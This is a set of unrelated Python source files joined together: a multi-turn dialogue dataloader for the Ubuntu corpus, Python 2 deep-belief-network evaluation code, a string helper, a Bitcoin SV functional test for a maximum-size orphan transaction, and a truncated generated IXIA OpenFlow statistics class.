self.vocab_list, self.data = self._load_data()
self.word2id = {w: i for i, w in enumerate(self.vocab_list)}
# postprocess initialization
self.index = {}
self.batch_id = {}
self.batch_size = {}
for key in self.key_name:
self.batch_id[key] = 0
self.batch_size[key] = None
self.index[key] = list(range(len(self.data[key]['session'])))
def _load_data(self):
r'''This function is called during the initialization.
Returns:
(tuple): tuple containing (refer to the following example):
vocab_list (list): vocabulary list of the datasets.
data (dict): a dict contains data.
Examples:
.. highlight:: python
.. code-block:: python
vocab_list = ["<pad>", "<unk>", "<go>", "<eos>", "<eot>", "how", \
"are", "you", "hello", "i", "am", \
"fine", "hi"]
data = {
"train": {
"session": [
[
[2, 12, 3, 5, 6, 7, 3, 4], # session_0, turn_0: <go> hi <eos> how are you <eos> <eot>
[2, 9, 10, 11, 3, 4], # session_0, turn_1: <go> i am fine <eos> <eot>
],
[
... # session_1, similar to session_0
],
...
]
},
"dev": {...}, # similar to train
"test": {...}, # similar to train
}
Notes:
You can use ``ext_vocab``, ``key_name``, ``pad_id``, ``unk_id``, ``go_id``,
``eos_id``, ``eot_id``, but other attributes are not initialized.
'''
raise NotImplementedError("This function should be implemented by subclasses.")
@property
def vocab_size(self):
'''Equals to `len(self.vocab_list)`. Read only.
'''
return len(self.vocab_list)
def restart(self, key, batch_size=None, shuffle=True):
'''Initialize mini-batches. Must call this function before :func:`get_next_batch`
or an epoch is end.
Arguments:
key (str): must be contained in `key_name`
batch_size (None or int): default (None): use last batch_size.
shuffle (bool): whether to shuffle the data. default: `True`
'''
if key not in self.key_name:
raise ValueError("No set named %s." % key)
if batch_size is None and self.batch_size[key] is None:
raise ValueError("You need batch_size to intialize.")
if shuffle:
random.shuffle(self.index[key])
self.batch_id[key] = 0
if batch_size is not None:
self.batch_size[key] = batch_size
print("%s set restart, %d batches and %d left" % (key, \
len(self.index[key]) // self.batch_size[key], \
len(self.index[key]) % self.batch_size[key]))
def get_batch(self, key, index):
'''Get a batch of specified `index`.
Arguments:
key (str): must be contained in `key_name`
index (list): a list of specified index
Returns:
A dict at least contains ``session``. See the example belows.
A list contains each turn data of ``content`` and ``length`` as a dict, of which the length equals to turn.
Examples:
>>> dataloader.get_batch('train', 1)
>>>
Todo:
* fix the missing example
'''
if key not in self.key_name:
raise ValueError("No set named %s." % key)
res = []
batch_size = len(index)
batch_data = [self.data[key]['session'][i] for i in index]
max_turn_length = np.max([len(session) for session in batch_data])
for turn in range(max_turn_length):
res_turn = {}
res_turn['length'] = np.array(list(map(lambda d: len(d[turn]) if len(d) > turn else 0, \
batch_data)))
res_turn['content'] = np.zeros((batch_size, np.max(res_turn['length'])), dtype=int) + \
self.pad_id
for idx, session in enumerate(batch_data):
if res_turn['length'][idx] > 1:
content = session[turn]
res_turn['content'][idx, :len(content)] = content
res.append(res_turn)
return res
def get_next_batch(self, key, ignore_left_samples=False):
'''Get next batch.
Arguments:
key (str): must be contained in `key_name`
ignore_left_samples (bool): Ignore the last batch, whose sample num
is not equal to `batch_size`. Default: `False`
Returns:
A dict like :func:`get_batch`, or None if the epoch is end.
'''
if key not in self.key_name:
raise ValueError("No set named %s." % key)
if self.batch_size[key] is None:
raise RuntimeError("Please run restart before calling this function.")
batch_id = self.batch_id[key]
start, end = batch_id * self.batch_size[key], (batch_id + 1) * self.batch_size[key]
if start >= len(self.index[key]):
return None
if ignore_left_samples and end > len(self.index[key]):
return None
index = self.index[key][start:end]
res = self.get_batch(key, index)
self.batch_id[key] += 1
return res
def sen_to_index(self, sen):
'''Convert a sentences from string to index representation.
Arguments:
sen (list): a list of str, representing each token of the sentences.
Examples:
>>> dataloader.sen_to_index(
... ["<go>", "I", "have", "been", "to", "Sichuan", "province", "eos"])
>>>
Todo:
* fix the missing example
'''
return list(map(lambda word: self.word2id.get(word, self.unk_id), sen))
def trim_index(self, index):
'''Trim index. There will be two steps:
* find first `<eot>` and abondon words after it (included the `<eot>`).
* ignore `<pad>` s at the end of the sentence.
Arguments:
index (list): a list of int
Examples:
>>> dataloader.index_to_sen(
... [])
>>>
Todo:
* fix the missing example
'''
index = trim_before_target(list(index), self.eot_id)
idx = len(index)
while index[idx-1] == self.pad_id:
idx -= 1
index = index[:idx]
return index
def index_to_sen(self, index, trim=True):
'''Convert a sentences from index to string representation
Arguments:
index (list): a list of int
trim (bool): if True, call :func:`trim_index` before convertion.
Examples:
>>> dataloader.index_to_sen(
... [])
>>>
Todo:
* fix the missing example
'''
if trim:
index = self.trim_index(index)
return list(map(lambda word: self.vocab_list[word], index))
def get_teacher_forcing_metric(self, gen_prob_key="gen_prob"):
'''Get metric for teacher-forcing mode.
It contains:
* :class:`.metric.PerlplexityMetric`
Arguments:
gen_prob_key (str): default: `gen_prob`. Refer to :class:`.metric.PerlplexityMetric`
'''
return PerlplexityMetric(self, gen_prob_key=gen_prob_key)
def get_inference_metric(self, gen_key="gen"):
'''Get metric for inference.
It contains:
* :class:`.metric.BleuCorpusMetric`
* :class:`.metric.SingleDialogRecorder`
Arguments:
gen_key (str): default: "gen". Refer to :class:`.metric.BleuCorpusMetric` or
:class:`.metric.SingleDialogRecorder`
'''
metric = MetricChain()
metric.add_metric(BleuCorpusMetric(self, gen_key=gen_key))
metric.add_metric(SingleDialogRecorder(self, gen_key=gen_key))
return metric
class UbuntuCorpus(MultiTurnDialog):
'''A dataloder for OpenSubtitles dataset.
Arguments:
file_path (str): a str indicates the dir of OpenSubtitles dataset.
min_vocab_times (int): A cut-off threshold of `UNK` tokens. All tokens appear
less than `min_vocab_times` will be replaced by `<unk>`. Default: 10.
max_sen_length (int): All sentences longer than `max_sen_length` will be shortened
to first `max_sen_length` tokens. Default: 50.
max_turn_length (int): All sessions longer than `max_turn_length` will be shortened
to first `max_turn_length` sentences. Default: 20.
Refer to :class:`.MultiTurnDialog` for attributes.
Todo:
* add references
'''
def __init__(self, file_path, min_vocab_times=10, max_sen_length=50, max_turn_length=20):
self._file_path = file_path
self._min_vocab_times = min_vocab_times
self._max_sen_length = max_sen_length
self._max_turn_length = max_turn_length
super(UbuntuCorpus, self).__init__()
def _load_data(self):
r'''Loading dataset, invoked by MultiTurnDialog.__init__
'''
origin_data = {}
for key in self.key_name:
with open('%s/ubuntu_corpus_%s.csv' % (self._file_path, key)) as f:
raw_data = list(csv.reader(f))
head = raw_data[0]
if head[2] == 'Label':
raw_data = [d[0] + d[1] for d in raw_data[1:] if d[2] == '1.0']
else:
raw_data = [d[0] + d[1] for d in raw_data[1:]]
raw2line = lambda raw: [sent.strip().split() \
for sent in raw.strip().replace('__eou__', '<eos>').split('__eot__')]
origin_data[key] = {'session': list(map(raw2line, raw_data))}
vocab = list(chain(*chain(*(origin_data['train']['session']))))
# Important: Sort the words preventing the index changes between different runs
vocab = sorted(Counter(vocab).most_common(), key=lambda pair: (-pair[1], pair[0]))
left_vocab = list(filter(lambda x: x[1] >= self._min_vocab_times, vocab))
left_vocab = list(map(lambda x: x[0], left_vocab))
left_vocab.remove('<eos>')
vocab_list = self.ext_vocab + left_vocab
word2id = {w: i for i, w in enumerate(vocab_list)}
print("vocab list length = %d" % len(vocab_list))
line2id = lambda line: ([self.go_id] + list(map(lambda word: word2id.get(word, self.unk_id), line)) + \
[self.eot_id])[:self._max_sen_length]
data = {}
for key in self.key_name:
data[key] = {}
data[key]['session'] = [list(map(line2id, session[:self._max_turn_length])) \
for session in origin_data[key]['session']]
vocab = list(chain(*chain(*(origin_data[key]['session']))))
vocab_num = len(vocab)
oov_num = len(list(filter(lambda word: word not in word2id, vocab)))
sent_length = list(map(len, chain(*origin_data[key]['session'])))
cut_word_num = np.sum(np.maximum(np.array(sent_length) - self._max_sen_length + 2, 0))
turn_length = list(map(len, origin_data[key]['session']))
sent_num = np.sum(turn_length)
cut_sent_num = np.sum(np.maximum(np.array(turn_length) - self._max_turn_length, 0))
print(("%s set. OOV rate: %f, max sentence length before cut: %d, cut word " + \
"rate: %f\n\tmax turn length before cut: %d, cut sentence rate: %f") % \
(key, oov_num / vocab_num, max(sent_length), cut_word_num / vocab_num, \
max(turn_length), cut_sent_num / sent_num))
return vocab_list, data
|
__author__ = 'larsmaaloee'
import os
import env_paths as ep
import matplotlib
import numpy as np
from DBN.dbn import generate_output_for_test_data, generate_output_for_train_data, generate_input_data_list
from DataPreparation.data_processing import get_all_class_indices, get_all_class_names
from heapq import nsmallest
from scipy.spatial.distance import cosine, euclidean, cdist
from multiprocessing import Pool
import multiprocessing
import serialization as s
from collections import Counter
from sklearn.metrics import confusion_matrix
import pylab as plot
import time
class DBNTesting:
def __init__(self, testing=True, binary_output=False):
"""
@param testing: Should be True if test data is to be plottet. Otherwise False.
@param image_data: If the testing should be done on image data.
@param binary_output: If the output of the DBN must be binary.
"""
if not check_for_data:
print 'No DBN data or testing data.'
return
self.status = -1
self.output = []
self.testing = testing
self.binary_output = binary_output
try:
self.output_data = s.load(open('output/output_data.p', 'rb'))
self.class_indices = s.load(open('output/class_indices.p', 'rb'))
except:
self.output_data = generate_output_for_test_data(
binary_output=self.binary_output) if testing else generate_output_for_train_data(
binary_output=self.binary_output)
self.class_indices = get_all_class_indices(training=False) if testing else get_all_class_indices()
s.dump([out.tolist() for out in self.output_data], open('output/output_data.p', 'wb'))
s.dump(self.class_indices, open('output/class_indices.p', 'wb'))
self.output_data = np.array(self.output_data)
def generate_accuracy_measurement(self, evaluation_points):
"""
Generate an accuracy measurement for the current DBN. This method will run through each output of the
dataset and check whether its X neighbors are of the same category. The amount of neighbors will evalu-
ate in a percentage score. So for instance an output who has 3 neighbors where 2 are of the same cate-
gory will get the accuracy score of 2/3. All accuracy scores are averaged at the end. This algorithm will
run for an X amound of evaluation_points.
@param evaluation_points: A list containing the number of neighbors that are to be evaluated. i.e. [1,3]
means that the method should calculate the accuracy measurement for 1 and 3 neighbors.
"""
accuracies = []
for e in evaluation_points:
self.__output('Evaluation: %i'%(e))
acc = 0.0
for it in range(len(self.output_data)):
o1 = self.output_data[it]
if self.binary_output:
distances = np.array(hamming_distance(o1, self.output_data), dtype=float)
distances[it] = np.Inf
else:
distances = np.array(distance(o1, self.output_data), dtype=float)
distances[it] = np.inf
# Retrieve the indices of the n maximum values
minimum_values = nsmallest(e, distances)
indices = []
for m in minimum_values:
i = list(np.where(np.array(distances) == m)[0])
indices += i
acc_temp = 0.0
for i in indices:
if self.class_indices[i] == self.class_indices[it]:
acc_temp += 1.0
acc_temp /= len(indices)
acc += acc_temp
if it + 1 % 1000 == 0:
self.__output('Correct: %.1f%% of %i'%((acc / (it + 1)) * 100,it+1))
accuracies.append(acc / len(self.output_data))
for i in range(len(accuracies)):
self.__output('Eval[%i]: %.2f%%'%(evaluation_points[i],accuracies[i]*100))
self.__write_output_to_file()
def __write_output_to_file(self):
print 'Outputting test scores to output folder.'
f = open('output/testscores.txt', 'wb')
for i in range(len(self.output)):
s = self.output[i]
f.write(s + "\n")
f.close()
def __output(self, s):
f = open('output/testscores.txt', 'a')
f.write(s + "\n")
f.close()
print s
self.output.append(s)
def generate_accuracy_measurement_parallel(self, evaluation_points):
"""
Parallel implementation of the accuracy measurement.
Generate an accuracy measurement for the current DBN. This method will run through each output of the
dataset and check whether its X neighbors are of the same category. The amount of neighbors will evalu-
ate in a percentage score. So for instance an output who has 3 neighbors where 2 are of the same cate-
gory will get the accuracy score of 2/3. All accuracy scores are averaged at the end. This algorithm will
run for an X amound of evaluation_points.
@param evaluation_points: A list containing the number of neighbors that are to be evaluated. i.e. [1,3]
means that the method should calculate the accuracy measurement for 1 and 3 neighbors.
"""
# Split outpudata for multiprocessing purposes.
self.split_output_data = []
self.split_class_indices = []
tmp_output_data = []
tmp_class_indices = []
for i in xrange(len(self.output_data)):
if i > 0 and i % 100 == 0:
self.split_output_data.append(tmp_output_data)
self.split_class_indices.append(tmp_class_indices)
tmp_output_data = []
tmp_class_indices = []
tmp_output_data.append(self.output_data[i])
tmp_class_indices.append(self.class_indices[i])
if len(tmp_output_data) > 0:
self.split_output_data.append(tmp_output_data)
self.split_class_indices.append(tmp_class_indices)
manager = multiprocessing.Manager()
distances_dict = manager.dict()
accuracies = []
for e in evaluation_points:
self.__output('Evaluate %i nearest neighbors.'%(e))
acc = 0.0
processed = 0
for i in xrange(len(self.split_output_data)):
o = self.split_output_data[i]
# init multiprocessing
manager = multiprocessing.Manager()
result_queue = manager.Queue()
p = Pool(multiprocessing.cpu_count())
p.map_async(generate_acc_for_doc, [(distances_dict, e, processed + i, result_queue, self.output_data,
self.class_indices, self.binary_output) for i in range(len(o))])
p.close()
p.join()
for _ in range(len(o)):
acc += result_queue.get()
processed += len(o)
if processed % 1000 == 0:
self.__output('Correct: %.1f%% of %i'%((acc/processed)*100,processed))
accuracies.append(acc / len(self.output_data))
for i in range(len(accuracies)):
self.__output('Eval[%i]: %.2f%%'%(evaluation_points[i],accuracies[i]*100))
self.__write_output_to_file()
def confusion_matrix(self, no_of_neighbors):
evaluated_class_indices = self.k_nearest_neibors(no_of_neighbors)
font = {'family': 'normal',
'weight': 'bold',
'size': 16}
matplotlib.rc('font', **font)
lbls = get_all_class_names()
for i in range(len(lbls)):
if len(lbls[i]) > 12:
str = lbls[i][:10]
lbls[i] = str + "..."
cm = confusion_matrix(self.class_indices, evaluated_class_indices, sorted(set(self.class_indices)))
# Show confusion matrix
fig = plot.figure()
ax = fig.add_subplot(111)
cax = ax.matshow(cm)
fig.colorbar(cax)
ax.set_xticklabels([''] + lbls)
plot.xticks(rotation=55)
ax.set_yticklabels([''] + lbls)
plot.yticks(rotation=55)
plot.ylabel('True label')
plot.xlabel('Predicted label')
plot.show()
def k_nearest_neibors(self, no_of_neighbors):
evaluated_class_indices = []
for it in range(len(self.output_data)):
# for it in range(5):
o1 = self.output_data[it]
if self.binary_output:
distances = np.array(hamming_distance(o1, self.output_data), dtype=float)
distances[it] = np.Inf
else:
# Compute distances between o1 and remaining outputs
distances = np.array(distance(o1, self.output_data), dtype=float)
distances[it] = np.inf
# Retrieve the indices of the n maximum values
minimum_values = nsmallest(no_of_neighbors, distances)
indices = []
for m in minimum_values:
i = list(np.where(np.array(distances) == m)[0])
indices += i
#if len(indices) > e: # TODO: Need to implement method to check for indices with same distance
# print 'Indices ',len(indices)-e,' greater than e.'
c = Counter(indices)
best_idx = -1
class_idx = -1
for i in range(len(c.keys())):
if c[c.keys()[i]] > c[best_idx]:
best_idx = c.keys()[i]
class_idx = self.class_indices[best_idx]
evaluated_class_indices.append(class_idx)
if it % 1000 == 0 and not it == 0:
print "Processed %d" % it
return evaluated_class_indices
def check_for_data():
"""
Check for DBN network data.
"""
if not (os.path.exists(ep.get_test_data_path()) or os.path.exists(ep.get_dbn_weight_path())):
return False
return True
def distance(v, m):
# v_tiled = np.tile(v,(len(m),1))
return cdist(np.array([v]), m, 'euclidean')[0]
def hamming_distance(v, m):
return np.sum((v != m), axis=1)
def generate_acc_for_doc(args):
"""
Generate accuracy measurement for a single doc. This function is used as a supplement to the parallel acc. meas-
urement method.
"""
distances_dict, e, idx, queue, output_data, class_indices, binary_output = args
try:
distances = distances_dict[idx]
except KeyError:
o1 = output_data[idx]
if binary_output:
distances = np.array(hamming_distance(o1, output_data), dtype=float)
distances[idx] = np.Inf
else:
distances = np.array(distance(o1, output_data), dtype=float)
distances[idx] = np.inf
distances_dict[idx] = distances
# Retrieve the indices of the n smallest values
minimum_values = nsmallest(e, distances)
indices = []
for m in minimum_values:
i = list(np.where(np.array(distances) == m)[0])
indices += i
acc_temp = 0.0
for i in indices:
if class_indices[i] == class_indices[idx]:
acc_temp += 1.0
acc_temp /= len(indices)
queue.put(acc_temp)
def LDA_DBN_comparison(lda_output_data, lda_doc_names, dbn_output_data, dbn_doc_names, evaluation_points,
binary_output=False):
dbn_output_data = np.array(dbn_output_data)
lda_output_data = np.array(lda_output_data)
# Split outpudata for multiprocessing purposes.
split_output_data = []
tmp_output_data = []
for i in xrange(len(dbn_output_data)):
if i > 0 and i % 100 == 0:
split_output_data.append(tmp_output_data)
tmp_output_data = []
tmp_output_data.append(dbn_output_data[i])
if len(tmp_output_data) > 0:
split_output_data.append(tmp_output_data)
accuracies = []
for e in evaluation_points:
print 'Evaluation: ', e
__append_output_to_file('Evaluation: ' + str(e))
acc = 0.0
processed = 0
for i in xrange(len(split_output_data)):
o = split_output_data[i]
# init multiprocessing
manager = multiprocessing.Manager()
result_queue = manager.Queue()
p = Pool()
p.map_async(generate_comparison, [(e, lda_output_data, lda_doc_names, dbn_output_data, dbn_doc_names,
processed + j, result_queue, binary_output) for j in range(len(o))])
p.close()
p.join()
for _ in range(len(o)):
acc += result_queue.get()
processed += len(o)
if processed % 1000 == 0:
s = 'Correct: ' + str((acc / (processed)) * 100)[:4] + "%" + ' of ' + str(processed)
print s
__append_output_to_file(s)
accuracies.append(acc / len(dbn_output_data))
def generate_comparison(args):
e, lda_output_data, lda_doc_names, dbn_output_data, dbn_doc_names, idx, queue, binary_output = args
o1 = dbn_output_data[idx]
dbn_indices = generate_proximity_indices(o1, dbn_output_data, idx, e, binary_output)
dbn_proximity_names = []
for i in dbn_indices:
dbn_proximity_names.append(dbn_doc_names[i])
dbn_doc_name = dbn_doc_names[idx]
lda_idx = np.where(np.array(lda_doc_names) == dbn_doc_name)[0][0]
o1 = lda_output_data[lda_idx]
lda_indices = generate_proximity_indices(o1, lda_output_data, idx, e, binary_output)
lda_proximity_names = []
for i in lda_indices:
lda_proximity_names.append(lda_doc_names[i])
# Compare the docnames
acc_temp = 0.0
for dn in dbn_proximity_names:
if dn in lda_proximity_names:
acc_temp += 1.0
if acc_temp > e:
acc_temp = float(e)
acc_temp /= e
queue.put(acc_temp)
def generate_proximity_indices(o1, output_data, idx, e, binary_output):
# Compute distances between o1 and remaining outputs
distances = distance(o1, output_data)
distances[idx] = np.inf
# Retrieve the indices of the n smallest values
minimum_values = nsmallest(e, distances)
indices = []
for m in minimum_values:
i = list(np.where(np.array(distances) == m)[0])
indices += i
return indices
def __write_output_to_file(s):
f = open('output/testscores.txt', 'wb')
f.write(s + "\n")
f.close()
def __append_output_to_file(s):
f = open('output/testscores.txt', 'a')
f.write(s + "\n")
f.close()
|
def trim_suffix(text, suffix):
"""Strip a suffix from text, if it appears (otherwise return text unchanged)"""
if not text.endswith(suffix):
return text
return text[: len(text) - len(suffix)]
|
#!/usr/bin/env python3
# Copyright (c) 2018-2020 Bitcoin Association
# Distributed under the Open BSV software license, see the accompanying file LICENSE.
"""
Check that orphan transaction with max allowed size is accepted.
"""
from test_framework.blocktools import create_transaction, create_coinbase, create_block
from test_framework.mininode import msg_tx, msg_block
from test_framework.script import CScript, OP_TRUE
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import wait_until, assert_equal
from test_framework.cdefs import DEFAULT_MAX_TX_SIZE_POLICY_AFTER_GENESIS
import time
def make_new_block(connection):
"Create and send block with coinbase, returns conbase (tx, key) tuple"
tip = connection.rpc.getblock(connection.rpc.getbestblockhash())
coinbase_tx = create_coinbase(tip["height"] + 1)
coinbase_tx.rehash()
block = create_block(int(tip["hash"], 16), coinbase_tx, tip["time"] + 1)
block.solve()
connection.send_message(msg_block(block))
wait_until(lambda: connection.rpc.getbestblockhash() == block.hash, timeout=10)
return coinbase_tx
def make_big_orphan(tx_parent, size_bytes):
add_bytes = size_bytes
diff = size_bytes
while diff != 0:
tx_child = create_transaction(tx_parent, 0, CScript(), tx_parent.vout[0].nValue - 2 * size_bytes, CScript([OP_TRUE] + [bytes(1) * add_bytes]))
tx_child.rehash()
diff = size_bytes - len(tx_child.serialize())
add_bytes += diff
return tx_child
class TestMaxSizedOrphan(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def setup_network(self):
self.setup_nodes()
def setup_nodes(self):
self.add_nodes(self.num_nodes)
def check_mempool(self, rpc, should_be_in_mempool):
wait_until(lambda: set(rpc.getrawmempool()) == {t.hash for t in should_be_in_mempool}, timeout=20)
def run_test(self):
with self.run_node_with_connections("Scenario 1", 0, ['-banscore=100000', '-genesisactivationheight=110', '-maxstdtxvalidationduration=100'],
number_of_connections=1) as (conn,):
coinbase1 = make_new_block(conn)
for _ in range(110):
make_new_block(conn)
tx_parent = create_transaction(coinbase1, 0, CScript(), coinbase1.vout[0].nValue - 1000, CScript([OP_TRUE]))
tx_parent.rehash()
tx_orphan = make_big_orphan(tx_parent, DEFAULT_MAX_TX_SIZE_POLICY_AFTER_GENESIS)
assert_equal(len(tx_orphan.serialize()), DEFAULT_MAX_TX_SIZE_POLICY_AFTER_GENESIS)
conn.send_message(msg_tx(tx_orphan))
# Making sure parent is not sent right away for bitcond to detect an orphan
time.sleep(1)
conn.send_message(msg_tx(tx_parent))
self.check_mempool(conn.rpc, [tx_parent, tx_orphan])
if __name__ == '__main__':
TestMaxSizedOrphan().main()
|
# MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import sys
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
if sys.version_info >= (3, 5):
from typing import List, Any, Union
class OpenflowAggregatedStatistics(Base):
"""Represents stats of OpenFlow Aggregated Statistics
The OpenflowAggregatedStatistics class encapsulates a required openflowAggregatedStatistics resource which will be retrieved from the server every time the property is accessed.
"""
__slots__ = ()
_SDM_NAME = "openflowAggregatedStatistics"
_SDM_ATT_MAP = {
"ActionErrorsRx": "actionErrorsRx",
"AuxiliaryConnectionsUp": "auxiliaryConnectionsUp",
"BarrierRepliesRx": "barrierRepliesRx",
"BarrierRequestsTx": "barrierRequestsTx",
"DescriptionStatRepliesRx": "descriptionStatRepliesRx",
"DescriptionStatRequestsTx": "descriptionStatRequestsTx",
"EchoRepliesRx": "echoRepliesRx",
"EchoRepliesTx": "echoRepliesTx",
"EchoRequestsRx": "echoRequestsRx",
"EchoRequestsTx": "echoRequestsTx",
"ErrorsRx": "errorsRx",
"ExperimenterErrorsRx": "experimenterErrorsRx",
"FeatureRepliesRx": "featureRepliesRx",
"FeatureRequestsTx": "featureRequestsTx",
"FlowAddsTx": "flowAddsTx",
"FlowAggregateStatRepliesRx": "flowAggregateStatRepliesRx",
"FlowAggregateStatRequestsTx": "flowAggregateStatRequestsTx",
"FlowDelsTx": "flowDelsTx",
"FlowModErrorsRx": "flowModErrorsRx",
"FlowModsTx": "flowModsTx",
"FlowRateflowssec": "flowRateflowssec",
"FlowRemovesRx": "flowRemovesRx",
"FlowStatRepliesRx": "flowStatRepliesRx",
"FlowStatRequestsTx": "flowStatRequestsTx",
"GetAsynchronousConfigRepliesRx": "getAsynchronousConfigRepliesRx",
"GetAsynchronousConfigRequestsTx": "getAsynchronousConfigRequestsTx",
"GetConfigRepliesRx": "getConfigRepliesRx",
"GetConfigRequestsTx": "getConfigRequestsTx",
"GetQueueConfigRepliesRx": "getQueueConfigRepliesRx",
"GetQueueConfigRequestsTx": "getQueueConfigRequestsTx",
"GroupAddsTx": "groupAddsTx",
"GroupDelsTx": "groupDelsTx",
"GroupDescRepliesRx": "groupDescRepliesRx",
"GroupDescRequestsTx": "groupDescRequestsTx",
"GroupFeatureRepliesRx": "groupFeatureRepliesRx",
"GroupFeatureRequestsTx": "groupFeatureRequestsTx",
"GroupModErrorsRx": "groupModErrorsRx",
"GroupModsTx": "groupModsTx",
"GroupStatRepliesRx": "groupStatRepliesRx",
"GroupStatRequestsTx": "groupStatRequestsTx",
"HelloErrorsRx": "helloErrorsRx",
"HellosRx": "hellosRx",
"HellosTx": "hellosTx",
"InstructionErrorsRx": "instructionErrorsRx",
"MatchErrorsRx": "matchErrorsRx",
"MeterAddsTx": "meterAddsTx",
"MeterConfigRepliesRx": "meterConfigRepliesRx",
"MeterConfigRequestsTx": "meterConfigRequestsTx",
"MeterDelsTx": "meterDelsTx",
"MeterFeatureRepliesRx": "meterFeatureRepliesRx",
"MeterFeatureRequestsTx": "meterFeatureRequestsTx",
"MeterModErrorsRx": "meterModErrorsRx",
"MeterModsTx": "meterModsTx",
"MeterStatRepliesRx": "meterStatRepliesRx",
"MeterStatRequestsTx": "meterStatRequestsTx",
"OfChannelConfigured": "ofChannelConfigured",
"OfChannelConfiguredUp": "ofChannelConfiguredUp",
"OfChannelFlapCount": "ofChannelFlapCount",
"OfChannelLearnedUp": "ofChannelLearnedUp",
"PacketInsRx": "packetInsRx",
"PacketOutsTx": "packetOutsTx",
"PacketinReasonAction": "packetinReasonAction",
"PacketinReasonInvalidTTL": "packetinReasonInvalidTTL",
"PacketinReasonNoMatch": "packetinReasonNoMatch",
"PortDescRepliesRx": "portDescRepliesRx",
"PortDescRequestsTx": "portDescRequestsTx",
"PortModErrorsRx": "portModErrorsRx",
"PortModsTx": "portModsTx",
"PortName": "portName",
"PortStatRepliesRx": "portStatRepliesRx",
"PortStatRequestsTx": "portStatRequestsTx",
"PortStatusesRx": "portStatusesRx",
"QueueOpErrorsRx": "queueOpErrorsRx",
"QueueStatRepliesRx": "queueStatRepliesRx",
"QueueStatRequestsTx": "queueStatRequestsTx",
"RequestErrorsRx": "requestErrorsRx",
"RoleRepliesRx": "roleRepliesRx",
"RoleRequestErrorsRx": "roleRequestErrorsRx",
"RoleRequestsTx": "roleRequestsTx",
"SetAsynchronousConfigTx": "setAsynchronousConfigTx",
"SetConfigTx": "setConfigTx",
"StatRepliesRx": "statRepliesRx",
"StatRequestsTx": "statRequestsTx",
"SwitchConfigErrorsRx": "switchConfigErrorsRx",
"TableFeatureErrorsRx": "tableFeatureErrorsRx",
"TableFeatureRepliesRx": "tableFeatureRepliesRx",
"TableFeatureRequestsTx": "tableFeatureRequestsTx",
"TableModErrorsRx": "tableModErrorsRx",
"TableModsTx": "tableModsTx",
"TableStatRepliesRx": "tableStatRepliesRx",
"TableStatRequestsTx": "tableStatRequestsTx",
"VendorMessagesRx": "vendorMessagesRx",
"VendorMessagesTx": "vendorMessagesTx",
"VendorStatRepliesRx": "vendorStatRepliesRx",
"VendorStatRequestsTx": "vendorStatRequestsTx",
}
_SDM_ENUM_MAP = {}
def __init__(self, parent, list_op=False):
super(OpenflowAggregatedStatistics, self).__init__(parent, list_op)
@property
def ActionErrorsRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Action Errors Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["ActionErrorsRx"])
@ActionErrorsRx.setter
def ActionErrorsRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["ActionErrorsRx"], value)
@property
def AuxiliaryConnectionsUp(self):
# type: () -> bool
"""
Returns
-------
- bool: Auxiliary Connections Up
"""
return self._get_attribute(self._SDM_ATT_MAP["AuxiliaryConnectionsUp"])
@AuxiliaryConnectionsUp.setter
def AuxiliaryConnectionsUp(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["AuxiliaryConnectionsUp"], value)
@property
def BarrierRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Barrier Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["BarrierRepliesRx"])
@BarrierRepliesRx.setter
def BarrierRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["BarrierRepliesRx"], value)
@property
def BarrierRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Barrier Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["BarrierRequestsTx"])
@BarrierRequestsTx.setter
def BarrierRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["BarrierRequestsTx"], value)
@property
def DescriptionStatRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Description Stat Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["DescriptionStatRepliesRx"])
@DescriptionStatRepliesRx.setter
def DescriptionStatRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["DescriptionStatRepliesRx"], value)
@property
def DescriptionStatRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Description Stat Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["DescriptionStatRequestsTx"])
@DescriptionStatRequestsTx.setter
def DescriptionStatRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["DescriptionStatRequestsTx"], value)
@property
def EchoRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Echo Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["EchoRepliesRx"])
@EchoRepliesRx.setter
def EchoRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["EchoRepliesRx"], value)
@property
def EchoRepliesTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Echo Replies Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["EchoRepliesTx"])
@EchoRepliesTx.setter
def EchoRepliesTx(self, value):
